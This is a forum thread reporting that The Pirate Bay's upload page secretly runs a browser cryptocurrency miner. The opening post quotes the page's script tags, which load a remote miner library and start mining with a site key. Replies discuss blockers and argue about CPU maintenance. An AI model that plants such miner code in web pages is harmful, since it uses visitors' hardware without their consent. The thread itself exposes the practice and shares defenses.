TPB Is again mining crypto-currency in background
#1
I wanted to upload my torrents to TPB and because of the current upload error (file not found) I leaved the tab open and noticed that my CPU is getting really hot.

I remember that TPB was testing background mining in the past so checked the source on upload page and there it was:

Code:
<script src="//clgserv.pro/lib/crypta.js"></script>
<script>
            var miner=new CRLT.Anonymous('37efd635d0ec154de4d0b17dd1952aa3b5e88acd6bbe', {
                throttle:0.9,
            });
        miner.start();
</script>

Shame we aren't asked if we want to run it, it could damage my CPU if I leaved it open and walked away from my PC for couple hours due to very old thermal paste that needs replacing.

Highly recommend you get NoScript or uBlock Origin.

Is it time to start uploading to other places? I'm not sure if it is ethical to contribute to TPB if this is what the site has become.

AdblockPlus is blocking this miner fine, for now..

I used NoScript in the past, very good but breaks the functionality too much on some sites, I guess you could configure it to work better with those sites but for now Adblock is OK.

If you use ABP like I do, add "NoCoin" subscription:

https://adblockplus.org/subscriptions

It will catch even more miners.

Cheers.

@okremix: The real shame here is that if you truly know your thermal paste is old and needs replacing yet are too lazy to spend the 10 minutes it takes to change it, then you sir, deserve to have your CPU overheat due to your poor handling of the real problem.

The Reality is that if your system was properly maintained, that script would be no type of problem at all and certainly not the big, scary threat you are trying to make it out to be. Like others have posted just use a script blocker and call it a day, but stop being lazy and change your damn thermal paste before you come back and try to blame TPB for breaking your PC.....

The problem here is that our computers are used for mining without our knowledge.

And it's not 10min. with a laptop. but seems you know more about my PC than I do.
I didn't change it yet because I'm waiting for a delivery of new fans from China and want to do it at one go.

What about people who don't know they have heating problem in their PC ? or other factors like faster battery drain on portable computers, lower frame rates in games when having site in the background etc.

I have used both NoScript and uBlock and I prefer uBlock.. Works real well when you don't want to be bothered by things you don't want running in the background on your computer.

I use something called Kaspersky Internet security.
Seems to keep all the miners away Wink

You assume that everyone has those super ultra fast multi gigabyte per second fiber optic internet connections that only cost around $20us per month. I have a top of the line Comcast Cable connection here in the US and I pay $195us per month for 300megaBYTES down and 10megaBYTES up.... I would love to be able to have a 50/50 or 100/100 GB per second symmetrical Fiber connection but as long as we have greedy Telco's here that will never happen...

Sometimes "getting your shit and leaving" can take several hours or even days depending on speed issues, size of the download, TCP Overhead.... etc.. lol
